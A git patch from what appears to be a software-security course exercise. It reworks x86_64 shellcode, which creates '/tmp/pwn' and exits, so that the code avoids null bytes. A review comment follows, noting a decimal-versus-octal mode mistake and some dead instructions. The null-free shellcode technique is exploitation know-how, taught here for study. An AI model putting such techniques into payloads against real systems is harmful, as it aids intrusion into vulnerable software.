From 2a4a11be2000f151e2ad0f3558ee1e44dcdd5007 Mon Sep 17 00:00:00 2001
From: Yorick Barbanneauwq
Date: Thu, 30 Mar 2023 01:19:07 +0200
Subject: [PATCH] Working shellcode but one \0 remains

---
 .../files/q3/shellcode.S | 30 ++++++++++++-------
 1 file changed, 19 insertions(+), 11 deletions(-)

diff --git a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/shellcode.S b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/shellcode.S
index e796567..7c3816a 100644
--- a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/shellcode.S
+++ b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/shellcode.S
@@ -2,19 +2,27 @@
 	.globl _start
 _start:
-	call pwnd
+	call p
 	.asciz "/tmp/pwn"
-pwnd:
-	# We are on x86_64, we must move 8 bytes up from stack pointer
-	popq %rdi
-	movq $0666, %rsi
-	movq $85, %rax
+
+p:
+	xorq %rdi, %rdi
+	pop %rdi
+	#shr $0x8, %rdi
+	push $0xfffffffffffffd66
+	xor %rsi, %rsi
+	pop %rsi
+	neg %rsi
+	push $85
+	pop %rax
 	syscall
-	ret
-	# exit(42)
-	movq $42, %rdi
-	movq $60, %rax
+	xorq %rax, %rax
+	xorq %rdi, %rdi
+	push $42
+	pop %rdi
+	push $61
+	pop %rax
+	lea -1(%rax), %rax
 	syscall
-
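Review bot: The mode argument no longer matches the line it replaces: `push $0xfffffffffffffd66` followed by `neg %rsi` leaves rsi = 0x29a, which is 666 decimal, whereas the removed `movq $0666, %rsi` was octal 0666 (438 decimal), so the creat() call in the first `syscall` now passes mode 01232 rather than 0666; the intended mode should be stated in a comment next to the push and the constant made to agree with it. The `xorq %rdi, %rdi` before `pop %rdi`, and the `xorq %rax, %rax` / `xorq %rdi, %rdi` pair before the later push/pop sequences, are dead work, since a 64-bit pop overwrites the whole register. The commented-out `#shr $0x8, %rdi` should be dropped rather than left as dead code, and the explanatory comment this commit removed deserves a replacement such as `# pop %rdi: the return address pushed by call p is the address of the string above` so the call/pop addressing trick is documented. The hunk's three blank context lines were lost when the patch was collapsed onto one line, so line positions in the reformatted view are approximate.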